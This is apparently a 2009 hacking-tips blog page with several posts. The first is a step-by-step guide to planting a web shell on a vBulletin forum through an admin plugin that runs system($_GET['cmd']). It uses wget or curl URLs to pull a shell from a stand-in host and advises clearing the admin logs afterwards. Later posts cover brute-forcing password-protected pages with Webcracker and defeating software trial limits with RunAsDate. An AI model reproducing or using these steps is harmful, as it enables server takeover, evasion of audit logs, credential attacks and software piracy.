Upload Shell on vBulletin

Saturday, April 4, 2009

Requirements:
- Admin Access

. Log into the admin cp.

2. Under 'Plugins & Products' select Add New Plugin

3. Set the settings as follows:

Product : vBulletin

Hook Location : global_start

Title : (Anything non fishy.. I use 'DEFAULT PLUG')

Execution Order : 5

Plugin PHP Code:


Code:

ob_start();
system($_GET['cmd']);
$execcode = ob_get_contents();
ob_end_clean();

Plugin is Active : Yes

4. After the plugin is added, go to under 'Styles & Templates', select 'Style Manager'

5. Under whatever the default style is, in the drop down menu select Edit Templates.

6. Scroll to ForumHome Templates and expand it. Click on [CUSTOMIZE] next to FORUMHOME.

7. Look for

Code:

$header

somewhere near the top. Replace it with:

Code:

$header
$execcode

8. Go to the main forum page... You should see it saying, "Cannot execute blank command" somewhere on the page. If you see "System() has been disabled" or anything like that, then it's a shitty server, forget it.

9. Now go to the forum and add the following after index.php

Code:

?cmd=wget http://www.evilshell.com/shell.txt;mv shell.txt shell.php

So it would look like

Code:

http://www.site.com/pathtoforum/index.php?cmd=wget http://www.(your shell name).com/shell.txt;mv shell.txt shell.php

What this does, is downloads shell.txt, and renames it to shell.php.

Now, the shell should be located in shell.php in the forums directory... If not, then get is disabled on this server, you can try some alternate methods:

Code:

http://www.site.com/pathtoforum/index.php?cmd=curl http://www.(your shell name).com/shell.txt > shell.php

Code:

http://www.site.com/pathtoforum/index.php?cmd=GET http://www.(your shell name).com/shell.txt shell.php

After you have your real shell on there, remove the plugin, and remove the $execcode from the FORUMHOME section of the template.

Don't forget to clear your admin logs

H4cking Password Protected Pages

webmaster protect pages with passwords to make sure that only those people who have got valid passwords can see them!

but, we can see those password protected pages by bruteforcing!

in this case we are taking the help of a tool named as "Webcracker"

This article simply teaches on "How to Use Webcracker" tO enter password protected pages!

Lets start,

1:first find a password protected page:

For this example, we are taking this Url: http://hacking.isgreat.org/restrictedpage/

Its a password protected page so, in order to crack its password we need the tool "Webcracker"

Here is the download link to download "Webcracker"

Code:

http://downloads.securityfocus.com/tools/WebCrack40.zip

Description OF "Webcracker":

WHAT IS WEB CRACKER?

This program exploits a rather large hole
in web site authentication methods.
Password protected websites can be
easily brute-force hacked, because there is
no set limit on the number of time an
incorrect password or User ID can be tried.

Web Cracker was designed for Web Masters
to test the vulnerability of their own
sites. It SHOULD NOT be used by unauthorized
persons to hack into web sites. Such
use is ILLEGAL and could have SEVERE PENALTIES.
Neither myself nor anyone involved
with the development of Web Cracker will be
liable for the misuse of this program.
Use Web Cracker ONLY at your own risk,
ONLY for lawful purposes, and ONLY on your own
web site.


Now, lets start:

1.Download webcracker from the link given above

2.start webcracker

3.See the picture for help on "How to use"




look at the picture carefully!

1.Enter the location of the "username" File
2. Enter the location of the "password" file
3. Enter the password protected "url".

Click the start button below the file menu:

Now, give it some time to crack the username/password for you!

it will take time depending on the complexity of the password!

After some time, you will most likely be receiving a message Screen like this:



Now, just copy the username and password from the list [the one which is showing a resutl of 200 Ok]

open the page in your browser and you were In

This article is only meant for educational purpose - Dont misuse it!

steal flash games and movies

Most people know how to do this so this is for the n00b

step 1-make sure you have firefox if you don't go here => www.mozilla.com and get it.

step 2-find the flash movie or game you want.

step 3-right click on the actual page that the move/game is on.

step 4-click view page info

step 5-click the media tab and find the "embed" file that is the one of the game or movie it will be labeled something like porn.swf just make sure it has the swf ending

step 6-click save as and it will download to your place of choice and as soon as the movie/game loads it will be there

step 7-make sure you have something to view it with like a flash player or irfanview

Tired of writing ".net", ".org" and ".com" all the time

- You tired of writing the whole URL in the URL-Box ?!
- You tired of writing .com?!
- You tired of writing .net?!
- You tired of writing .org?!

Then I got a little trick for you

Step 1: Click on the URL box on the top of your browser.
Step 2: write "website name"
Step 3: Hold down the Shift button and click Enter.

What happened? Well, the Shift + Enter completed the URL

* Ctrl + Enter = .com
* Skift + Enter = .net
* Ctrl + Skift + Enter = .org

use trial program 4ever without activation

When softwares are installed for the first time, they make an entry into the Windows Registry with the details such as Installed Date and Time, installed path etc.After installation every time you run the software, it compares the current system date and time with the installed date and time.So, with this it can make out whether the trial period is expired or not.

So with this being the case, just manually changing the system date to an earlier date will not solve the problem.For this purpose there is a small Tool known as RunAsDate.

RunAsDate is a small utility that allows you to run a program in the date and time that you specify. This utility doesn’t change the current system date, but it only injects the date/time that you specify into the desired application.

RunAsDate intercepts the kernel API calls that returns the current date and time (GetSystemTime, GetLocalTime, GetSystemTimeAsFileTime), and replaces the current date/time with the date/time that you specify.It works with Windows 2000, XP, 2003 and Vista.

You have to follow these tips carefully to successfully hack a software and make it run in it’s trial mode forever.

1. Note down the date and time, when you install the software for the first time.

2. Once the trial period expires, you must always run the software using RunAsDate.

3. After the trial period is expired, do not run the software(program) directly.If you run the software directly even once, this hack may no longer work.

4. It is better and safe to inject the date of the last day in the trial period.

For example, if the trial period expires on jan 30 2009, always inject the date as jan 29 2009 in the RunAsDate.